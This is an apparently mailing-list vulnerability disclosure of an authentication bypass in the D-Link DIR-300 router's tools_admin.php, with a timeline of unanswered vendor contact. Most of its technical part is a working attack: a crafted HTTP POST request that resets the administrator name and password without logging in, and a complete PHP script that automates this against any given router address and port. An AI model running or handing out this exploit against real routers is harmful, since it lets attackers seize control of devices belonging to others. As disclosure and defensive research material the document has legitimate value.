D-Link DIR-300 authentication bypass
[intro]
Hello, I found security bug in D-Link DIR-300 wireless router. It can
be used to bypass authentication mechanizm by attacker with access to
web interface. I reported it to D-Link but they are not replying for
my emails. According to other D-Link security holes and their status I
think that they won't reply, so I decided to write about it here.
[Technical details]
Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:
---cut here---
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0
ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_NEE=
D_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3DuhOHahEh
---cut here---
If attacker makes this request to the control panel, the
administrator username is set to admin with password ,,uhOHahEh".
[Affected]
- All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
- There is possibility that other dlink devices which use the same php
scripts in control panel are affected. I'm not able to check it
because I don't have devices for tests. I'm counting on you ;->
[Code]
---cut here---
<?php
if(sizeof($argv)!=3D4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=3Dcurl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php"=
);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_NE=
ED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3D".urlencode=
($argv[3]));
echo "+ starting request\n";
$out =3D curl_exec($ch);
if($out=3D=3D=3Dfalse) {
echo "- Error: could not connect (
http://$argv[1]:$argv[2]/tools_admin.php).\n";
exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"Successfully")=3D=3D=3Dfalse) {
echo "- something goes wrong (check answer - answer.html) !=
\n";
$f=3Dfopen("answer.html","w"); fwrite($f,$out); fclose($f);
exit;
}
else
echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
---cut here---
[History]
- Information sent to vendor 07.08.2010
- No response
- Information resended to vendor 07.31.2010
- No response from vendor
[Credits]
Karol Celi=C5=84ski ( Celin )
Pentester/Researcher @ Safe Computing
[Contact]
karol at celin dot pl
[Greetz]
Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
members.
討論串 (同標題文章)
完整討論串 (本文為第 1 之 9 篇):